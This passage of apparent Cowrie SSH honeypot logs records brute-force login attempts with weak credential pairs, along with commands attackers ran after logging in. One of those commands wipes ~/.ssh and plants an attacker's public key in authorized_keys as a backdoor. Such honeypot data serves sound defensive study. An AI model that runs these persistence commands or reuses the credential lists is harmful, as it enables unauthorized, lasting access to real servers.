message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:45:32.381763Z","src_ip":"212.227.235.229","session":"24e0353c4cd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55014,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d64feab9061","protocol":"ssh","message":"New connection: 212.227.235.229:55014 (1.2.3.4:22) [session: 4d64feab9061]","sensor":"my-vps","timestamp":"2025-08-28T15:45:32.445332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:45:32.445964Z","src_ip":"212.227.235.229","session":"4d64feab9061"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:45:32.663954Z","src_ip":"212.227.235.229","session":"4d64feab9061"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:45:33.576702Z","src_ip":"212.227.235.229","session":"4d64feab9061"}
{"eventid":"cowrie.login.success","username":"root","password":"vagrant","message":"login attempt [root/vagrant] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:45:33.644536Z","src_ip":"212.227.235.229","session":"24e0353c4cd9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:45:34.294246Z","src_ip":"212.227.235.229","session":"24e0353c4cd9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:45:34.295416Z","src_ip":"212.227.235.229","session":"24e0353c4cd9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:45:34.296520Z","src_ip":"212.227.235.229","session":"24e0353c4cd9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:34.612288Z","src_ip":"212.227.235.229","session":"24e0353c4cd9"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:34.797096Z","src_ip":"212.227.235.229","session":"4d64feab9061"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55028,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1020acb2864","protocol":"ssh","message":"New connection: 212.227.235.229:55028 (1.2.3.4:22) [session: c1020acb2864]","sensor":"my-vps","timestamp":"2025-08-28T15:45:35.020594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:45:35.021704Z","src_ip":"212.227.235.229","session":"c1020acb2864"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:45:35.246315Z","src_ip":"212.227.235.229","session":"c1020acb2864"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:45:35.301134Z","src_ip":"212.227.235.229","session":"24e0353c4cd9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:45:35.301909Z","src_ip":"212.227.235.229","session":"24e0353c4cd9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:45:35.618457Z","src_ip":"212.227.235.229","session":"24e0353c4cd9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:35.619471Z","src_ip":"212.227.235.229","session":"24e0353c4cd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51344,"dst_ip":"1.2.3.4","dst_port":22,"session":"132e6a8167f4","protocol":"ssh","message":"New connection: 212.227.235.229:51344 (1.2.3.4:22) [session: 132e6a8167f4]","sensor":"my-vps","timestamp":"2025-08-28T15:45:35.923197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:45:35.924025Z","src_ip":"212.227.235.229","session":"132e6a8167f4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:45:36.184532Z","src_ip":"212.227.235.229","session":"c1020acb2864"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:45:36.230048Z","src_ip":"212.227.235.229","session":"132e6a8167f4"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:36.410471Z","src_ip":"212.227.235.229","session":"cf57f367762e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:36.411649Z","src_ip":"212.227.235.229","session":"c1020acb2864"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:45:37.498046Z","src_ip":"212.227.235.229","session":"132e6a8167f4"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:38.806846Z","src_ip":"212.227.235.229","session":"132e6a8167f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51352,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe1bfb98ea5b","protocol":"ssh","message":"New connection: 212.227.235.229:51352 (1.2.3.4:22) [session: fe1bfb98ea5b]","sensor":"my-vps","timestamp":"2025-08-28T15:45:39.125432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:45:39.126559Z","src_ip":"212.227.235.229","session":"fe1bfb98ea5b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:45:39.440661Z","src_ip":"212.227.235.229","session":"fe1bfb98ea5b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:45:40.745640Z","src_ip":"212.227.235.229","session":"fe1bfb98ea5b"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:41.061702Z","src_ip":"212.227.235.229","session":"24e0353c4cd9"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:41.062608Z","src_ip":"212.227.235.229","session":"fe1bfb98ea5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32010,"dst_ip":"1.2.3.4","dst_port":22,"session":"0db4f2795c3c","protocol":"ssh","message":"New connection: 212.227.125.160:32010 (1.2.3.4:22) [session: 0db4f2795c3c]","sensor":"my-vps","timestamp":"2025-08-28T15:45:43.981233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:45:43.982219Z","src_ip":"212.227.125.160","session":"0db4f2795c3c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:45:44.062508Z","src_ip":"212.227.125.160","session":"0db4f2795c3c"}
{"eventid":"cowrie.login.failed","username":"jose","password":"jose","message":"login attempt [jose/jose] failed","sensor":"my-vps","timestamp":"2025-08-28T15:45:44.620297Z","src_ip":"212.227.125.160","session":"0db4f2795c3c"}
{"eventid":"cowrie.login.failed","username":"jose","password":"abc123","message":"login attempt [jose/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:45:45.703910Z","src_ip":"212.227.125.160","session":"0db4f2795c3c"}
{"eventid":"cowrie.login.failed","username":"jose","password":"abcd123","message":"login attempt [jose/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:45:46.793741Z","src_ip":"212.227.125.160","session":"0db4f2795c3c"}
{"eventid":"cowrie.login.failed","username":"jose","password":"abcd1234","message":"login attempt [jose/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:45:47.877469Z","src_ip":"212.227.125.160","session":"0db4f2795c3c"}
{"eventid":"cowrie.login.failed","username":"jose","password":"abc1234","message":"login attempt [jose/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:45:48.959864Z","src_ip":"212.227.125.160","session":"0db4f2795c3c"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:45:50.049402Z","src_ip":"212.227.125.160","session":"0db4f2795c3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46630,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4f88b6d1395","protocol":"ssh","message":"New connection: 212.227.235.229:46630 (1.2.3.4:22) [session: a4f88b6d1395]","sensor":"my-vps","timestamp":"2025-08-28T15:46:07.369914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:46:07.370725Z","src_ip":"212.227.235.229","session":"a4f88b6d1395"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:46:07.600310Z","src_ip":"212.227.235.229","session":"a4f88b6d1395"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"M3gaP33!","message":"login attempt [uftp/M3gaP33!] failed","sensor":"my-vps","timestamp":"2025-08-28T15:46:08.561096Z","src_ip":"212.227.235.229","session":"a4f88b6d1395"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:46:09.793192Z","src_ip":"212.227.235.229","session":"a4f88b6d1395"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62438,"dst_ip":"1.2.3.4","dst_port":22,"session":"0166efee387f","protocol":"ssh","message":"New connection: 212.227.125.160:62438 (1.2.3.4:22) [session: 0166efee387f]","sensor":"my-vps","timestamp":"2025-08-28T15:46:14.523848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:46:14.524727Z","src_ip":"212.227.125.160","session":"0166efee387f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:46:14.635376Z","src_ip":"212.227.125.160","session":"0166efee387f"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole","message":"login attempt [nichole/nichole] failed","sensor":"my-vps","timestamp":"2025-08-28T15:46:15.180375Z","src_ip":"212.227.125.160","session":"0166efee387f"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole1","message":"login attempt [nichole/nichole1] failed","sensor":"my-vps","timestamp":"2025-08-28T15:46:16.644998Z","src_ip":"212.227.125.160","session":"0166efee387f"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole123","message":"login attempt [nichole/nichole123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:46:17.759510Z","src_ip":"212.227.125.160","session":"0166efee387f"}
{"eventid":"cowrie.session.connect","src_ip":"130.185.122.7","src_port":33352,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f7ff5073a62","protocol":"ssh","message":"New connection: 130.185.122.7:33352 (1.2.3.4:22) [session: 6f7ff5073a62]","sensor":"my-vps","timestamp":"2025-08-28T15:46:18.808851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:46:18.809859Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T15:46:18.837814Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole1234","message":"login attempt [nichole/nichole1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:46:18.872246Z","src_ip":"212.227.125.160","session":"0166efee387f"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@1","message":"login attempt [root/Admin@1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:46:18.928784Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:46:19.002306Z","src_ip":"130.185.122.7","session":"6f7ff5073a62"}
